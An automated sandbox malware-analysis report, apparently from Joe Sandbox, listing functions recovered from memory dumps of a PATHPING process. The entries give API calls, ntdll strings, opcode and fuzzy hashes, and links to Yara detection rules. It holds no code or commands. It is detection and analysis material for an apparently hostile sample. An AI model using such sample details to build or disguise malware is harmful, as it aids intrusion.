                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: faa19c80f4feba2061a74ca3ae79c91efa0461eacaa1439af41494dbf367e914
                                                                                                                                • Instruction ID: a460ee9328da66094a01e8241fabd9037522e460c6220ea8600218feaa85d898
                                                                                                                                • Opcode Fuzzy Hash: faa19c80f4feba2061a74ca3ae79c91efa0461eacaa1439af41494dbf367e914
                                                                                                                                • Instruction Fuzzy Hash: BFF0A0B5E00109BBDB50CA95DC45FEFBB78EF55318F1082A9E90896201E3319A55CB91
                                                                                                                                Function 00414170 Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00414162
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: af889453b085852eccb278b9c7a2561df7d0aadd69b1b6e10842e4ddd5654ea4
                                                                                                                                • Instruction ID: 0babc218383284192802019a76c980fa2e8f6f46b1a326704204ff1808264c66
                                                                                                                                • Opcode Fuzzy Hash: af889453b085852eccb278b9c7a2561df7d0aadd69b1b6e10842e4ddd5654ea4
                                                                                                                                • Instruction Fuzzy Hash: D6F0A0B8D0010DBBDB00DA94DC46FEBB7B8DB44308F008195E80896241F230EA558B91
                                                                                                                                Function 00429260 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(00411649,?,0042527F,00411649,004251DF,0042527F,?,00411649,004251DF,00001000,?,?,00000000), ref: 0042929F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                • Opcode ID: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                                • Instruction ID: 4fa418944f56b6f034991f278695939fa83d0a6929944886ad3bbb60a3ac5853
                                                                                                                                • Opcode Fuzzy Hash: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                                • Instruction Fuzzy Hash: 26E06DB22003047BD610EE5ADC45E9B37ACEFC9724F404019F908A7242D630B8208BB9
                                                                                                                                Function 004292B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BFC4589,00000007,00000000,00000004,00000000,004139D6,000000F4), ref: 004292EF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                • Opcode ID: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                                • Instruction ID: 21fc7c0ddad84c324fee04ffd52fdd38f9a651d12109145d0747e93963df6a3e
                                                                                                                                • Opcode Fuzzy Hash: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                                • Instruction Fuzzy Hash: C1E06D72200204BBDA10EE59DC41EAB37ACDFC9724F404019F908A7242C674B91186B9
                                                                                                                                Function 00417EE0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 00417F0C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: 53d29c82f52b957d9f67e65202dd129e0b91a26103301d23a613c35b2bc8e6ec
                                                                                                                                • Instruction ID: b8e6d0830a8cd14578ec29319d9a4e6f5182beab166be2eaa619b699c8681a91
                                                                                                                                • Opcode Fuzzy Hash: 53d29c82f52b957d9f67e65202dd129e0b91a26103301d23a613c35b2bc8e6ec
                                                                                                                                • Instruction Fuzzy Hash: 46E0203124020427F7205E68DC45FB7336C478C764F584A51F81CDB3C1E63CF8424154
                                                                                                                                Function 00417ED9 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 00417F0C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: bcda1792175244ccc46f8540d3439c88d9e62693d137ea7d247dc54d411d73a5
                                                                                                                                • Instruction ID: e75d1b2769bc9a0b1a79463f8d35322dd951a24b024012b3ff9301ec17df101b
                                                                                                                                • Opcode Fuzzy Hash: bcda1792175244ccc46f8540d3439c88d9e62693d137ea7d247dc54d411d73a5
                                                                                                                                • Instruction Fuzzy Hash: 58E0D83124430427E7205E58CC45FA733684B48765F584A11F814AB2C1D638E9424254
                                                                                                                                Function 00417CD0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00411940,00427B1F,004251DF,00411906), ref: 00417D03
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                • Opcode ID: 5f88bc61a3014c15c064a01038728c29e2d6e49de9f991d3aa44fa949bf6a591
                                                                                                                                • Instruction ID: ab0f843539eed372df292286437dcf74d2235a3bdd9dc4ee03245b8632253c49
                                                                                                                                • Opcode Fuzzy Hash: 5f88bc61a3014c15c064a01038728c29e2d6e49de9f991d3aa44fa949bf6a591
                                                                                                                                • Instruction Fuzzy Hash: 7FD05E722813043BF600A6A6AC07F6632AC8B90755F49846AB908EB2D3F879E4004669
                                                                                                                                Function 02D12C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 6f1932f60152c5dd935e51ed8d349fb564cc0419c6f6f6568406c72e73fe34fd
                                                                                                                                • Instruction ID: 35e8658e1ab575ec7b82f82a34a628790ccccee93176fd79c8d6f82d84c7105b
                                                                                                                                • Opcode Fuzzy Hash: 6f1932f60152c5dd935e51ed8d349fb564cc0419c6f6f6568406c72e73fe34fd
                                                                                                                                • Instruction Fuzzy Hash: 0DB09B719055D5D6DB11E7605A0D717790167E0705F15C061D30347A1E4739C5D5F175

                                                                                                                                Non-executed Functions

                                                                                                                                Function 02B004DE Relevance: .1, Instructions: 149COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4121929401.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2b00000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5980dba0d7954c9c78fefc854ded5a613155a8df57f772f151d519c62611a94d
                                                                                                                                • Instruction ID: 6ba49e49334d912b49a59ad14f5adcc743b6fe74b87f3e9f3ca79a295951219f
                                                                                                                                • Opcode Fuzzy Hash: 5980dba0d7954c9c78fefc854ded5a613155a8df57f772f151d519c62611a94d
                                                                                                                                • Instruction Fuzzy Hash: 8E41EA7151CB0D4FD368BF6890C177AB7E2FB45300F50496DD98AC3692EB70E8468B85
                                                                                                                                Function 02B0DEC9 Relevance: 57.7, Strings: 46, Instructions: 222COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4121929401.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2b00000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                • API String ID: 0-3754132690
                                                                                                                                • Opcode ID: 1b334d22ca8f35166475ef0e57b6c0bf2ed59f2c579f69a47e29a63819b07711
                                                                                                                                • Instruction ID: e1e8736e2e028aafd8cd364e494197078d660145bf443b374f031d7705287770
                                                                                                                                • Opcode Fuzzy Hash: 1b334d22ca8f35166475ef0e57b6c0bf2ed59f2c579f69a47e29a63819b07711
                                                                                                                                • Instruction Fuzzy Hash: 2F915FF04482988AC7158F54A0612AFFFB1EBC6305F15856DE7E6BB243C3BE8945CB85
                                                                                                                                Function 02D12890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: a9a9a039ddc2c9d79b372520390da4383ff7d89ced21ff74684995277e0e10e7
                                                                                                                                • Instruction ID: 83fdf13766a304697672f27ed2162da47bf24b9254063705bf56dba630cb9113
                                                                                                                                • Opcode Fuzzy Hash: a9a9a039ddc2c9d79b372520390da4383ff7d89ced21ff74684995277e0e10e7
                                                                                                                                • Instruction Fuzzy Hash: F95128B2A44166BFDB10DB9C9994A7EF7B8FB08304B508129E895D7B45D735DE00CBE0
                                                                                                                                Function 02D82410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: 1349e2f1f341594223ac39fb09509fe89e7230c8490c3e8118da32f6bbfc14d2
                                                                                                                                • Instruction ID: c25068325f61af5842056fe6e766e4e203d04928171ebf7d5189ea7995abc2fd
                                                                                                                                • Opcode Fuzzy Hash: 1349e2f1f341594223ac39fb09509fe89e7230c8490c3e8118da32f6bbfc14d2
                                                                                                                                • Instruction Fuzzy Hash: E15103B5A40685AEDB20EE9CC89497FB7F9EF54304B4084AAE8D6D7741E774DE00CB60
                                                                                                                                Function 02D07630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 02D44787
                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02D446FC
                                                                                                                                • ExecuteOptions, xrefs: 02D446A0
                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02D44655
                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02D44725
                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02D44742
                                                                                                                                • Execute=1, xrefs: 02D44713
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                • API String ID: 0-484625025
                                                                                                                                • Opcode ID: 9ed2c543754740154c0ae06f07cfdb48b6c2c5938a38777a88af6b3736903e14
                                                                                                                                • Instruction ID: c13388a04bd3cab7bee652bf2979047654b8ba608bcb10479431ad9833694def
                                                                                                                                • Opcode Fuzzy Hash: 9ed2c543754740154c0ae06f07cfdb48b6c2c5938a38777a88af6b3736903e14
                                                                                                                                • Instruction Fuzzy Hash: 4551F8716002597AFF11ABA4DC95FE9B3A9EF44304F5400A9D506AB3E0DB71AE45CEA0
                                                                                                                                Function 02DA6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                • Instruction ID: 9e52276fb3487eaca37b492e1b1cfdb9717e629ffbfccad0e9fc70ed023fcded
                                                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                • Instruction Fuzzy Hash: EE02F471509341AFD705CF29C4A0E6EBBEAEFC8704F04892DB9958B364DB31E905CB92
                                                                                                                                Function 02D1B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-$0$0
                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                • Instruction ID: 16b1e9c0558bcae4f6eadd1c672f64111eff111696cd3178b691bd36008d45f9
                                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                • Instruction Fuzzy Hash: 6081A270E05249AEDF24CF68E8517FEBBB2AF55718F18415BE891ABB90C7349C41CB60
                                                                                                                                Function 02D820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                • Opcode ID: ff6cb9184160c1d0e94bc2d94c510f0b5c173bd3a85435cfdbcb0bff9b163630
                                                                                                                                • Instruction ID: 69f4095b14af563ab5ca55edcc32c787b27b9e47bc7954c3e52211bedd053ef4
                                                                                                                                • Opcode Fuzzy Hash: ff6cb9184160c1d0e94bc2d94c510f0b5c173bd3a85435cfdbcb0bff9b163630
                                                                                                                                • Instruction Fuzzy Hash: B7215E76A00159ABDB10EE69D944ABEBBF9EF54744F54012AED05E3300E730DE15CBA1
                                                                                                                                Function 02CFF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02D402BD
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02D402E7
                                                                                                                                • RTL: Re-Waiting, xrefs: 02D4031E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                • Opcode ID: de816f93182b79995cc476fda12679584d7b051cc1604dc429eaf26675d1df8c
                                                                                                                                • Instruction ID: 69b45bcc4790963dfb67c7824b18f828eca3e052edf484a3f96bc5ce9ffb7a36
                                                                                                                                • Opcode Fuzzy Hash: de816f93182b79995cc476fda12679584d7b051cc1604dc429eaf26675d1df8c
                                                                                                                                • Instruction Fuzzy Hash: 18E1CD306087419FD7A4CF28C884B2AB7E1EF89318F244A5DF6A58B7E0DB74D944CB52
                                                                                                                                Function 02D0BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02D47B7F
                                                                                                                                • RTL: Resource at %p, xrefs: 02D47B8E
                                                                                                                                • RTL: Re-Waiting, xrefs: 02D47BAC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 0-871070163
                                                                                                                                • Opcode ID: 6d063029810fd588564d25863b6b53362866aeaf1b1feff9f62da1d282d6dfd0
                                                                                                                                • Instruction ID: 35a821668ebc685d04ab4d79c2dde48e73dfd2ec5258ff8fba035c9562d95f5c
                                                                                                                                • Opcode Fuzzy Hash: 6d063029810fd588564d25863b6b53362866aeaf1b1feff9f62da1d282d6dfd0
                                                                                                                                • Instruction Fuzzy Hash: 6141AF317087029FD724DE258880B6ABBE5EF89714F100A2EE996DB7D0DB71EC45CB91
                                                                                                                                Function 02D0B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D4728C
                                                                                                                                Strings
                                                                                                                                • RTL: Resource at %p, xrefs: 02D472A3
                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02D47294
                                                                                                                                • RTL: Re-Waiting, xrefs: 02D472C1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                • Opcode ID: 7198916fb5fbe602b541f70c16293059b57e5a55c528c3643f56e24d5ca97d29
                                                                                                                                • Instruction ID: f56f87c836d69719e23e546833fa4572ca812920dd4d4018cf382349618efcef
                                                                                                                                • Opcode Fuzzy Hash: 7198916fb5fbe602b541f70c16293059b57e5a55c528c3643f56e24d5ca97d29
                                                                                                                                • Instruction Fuzzy Hash: 5841EF31704212ABEB20CE25CC81B6AB7A5FF95718F104619FD95EB390DB21EC46CBE1
                                                                                                                                Function 02D82300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                • Opcode ID: 1c322e76b07e2620588858fa9b90e458ffc2b9454fd0c032946ddd5bcf2fee38
                                                                                                                                • Instruction ID: 3d84001798b9722d37fec7cda7917d12f68dafc91005194c1633eefcba63ebd7
                                                                                                                                • Opcode Fuzzy Hash: 1c322e76b07e2620588858fa9b90e458ffc2b9454fd0c032946ddd5bcf2fee38
                                                                                                                                • Instruction Fuzzy Hash: F7317576A002599EDB20DE28DC54BAEB7F9EF44714F94455AEC89E3300EB309E448F60
                                                                                                                                Function 02D17D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
